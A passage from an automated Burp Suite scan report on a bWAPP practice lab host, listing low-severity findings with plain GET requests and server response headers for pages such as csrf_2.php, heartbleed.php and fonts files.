    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12954

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.37. http://192.168.52.147/bWAPP/credits.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/credits.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/credits.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/portal.php
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.38. http://192.168.52.147/bWAPP/csrf_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/csrf_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/csrf_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13464

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.39. http://192.168.52.147/bWAPP/csrf_3.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/csrf_3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/csrf_3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13282

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.40. http://192.168.52.147/bWAPP/directory_traversal_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/directory_traversal_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/directory_traversal_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13069

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/cs
    ...[SNIP]...
    18.41. http://192.168.52.147/bWAPP/directory_traversal_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/directory_traversal_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/directory_traversal_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13075

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/cs
    ...[SNIP]...
    18.42. http://192.168.52.147/bWAPP/fonts/

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/ HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Content-Length: 2527
    Connection: close
    Content-Type: text/html;charset=UTF-8
    X-Pad: avoid browser bug

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /bWAPP/fonts</title>
    </head>
    <body>
    <h1>Index of /bWAPP/fonts</h1>
    <table><tr><th><img src="/icons/blank.gif"
    ...[SNIP]...
    18.43. http://192.168.52.147/bWAPP/fonts/arial.ttf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arial.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/arial.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce062-bc860-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 772192
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.44. http://192.168.52.147/bWAPP/fonts/arialbd.ttf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbd.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/arialbd.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce065-b6cb0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 748720
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.45. http://192.168.52.147/bWAPP/fonts/arialbi.ttf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/arialbi.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/arialbi.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce066-891d0-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 561616
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.46. http://192.168.52.147/bWAPP/fonts/ariali.ttf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariali.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/ariali.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce05f-87a44-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 555588
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.47. http://192.168.52.147/bWAPP/fonts/ariblk.ttf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/ariblk.ttf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/ariblk.ttf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce067-1d444-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 119876
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.48. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/atommicclock.gdf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/atommicclock.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce061-13018-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 77848
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.49. http://192.168.52.147/bWAPP/fonts/backlash.gdf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/backlash.gdf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/backlash.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce063-10b40-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 68416
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.50. http://192.168.52.147/bWAPP/fonts/hootie.gdf

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/fonts/hootie.gdf

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/fonts/hootie.gdf HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/fonts/?C=M;O=A
    Cookie: security_level=1; PHPSESSID=4232bd2c1ff619c19b04a9254d90273a

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:52:18 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Last-Modified: Sun, 02 Nov 2014 22:52:04 GMT
    ETag: "ce064-10150-506e814298d00"
    Accept-Ranges: bytes
    Content-Length: 65872
    Connection: close
    Content-Type: text/plain

    ...[SNIP]...
    18.51. http://192.168.52.147/bWAPP/heartbleed.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/heartbleed.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/heartbleed.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12937

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.52. http://192.168.52.147/bWAPP/hostheader_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hostheader_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hostheader_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12734

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.53. http://192.168.52.147/bWAPP/hostheader_2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hostheader_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hostheader_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12990

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.54. http://192.168.52.147/bWAPP/hpp-1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hpp-1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hpp-1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12937

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.55. http://192.168.52.147/bWAPP/hpp-2.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hpp-2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hpp-2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: hpp-1.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.56. http://192.168.52.147/bWAPP/hpp-3.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/hpp-3.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/hpp-3.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: hpp-1.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.57. http://192.168.52.147/bWAPP/htmli_current_url.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/htmli_current_url.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/htmli_current_url.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13019

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.58. http://192.168.52.147/bWAPP/htmli_get.php

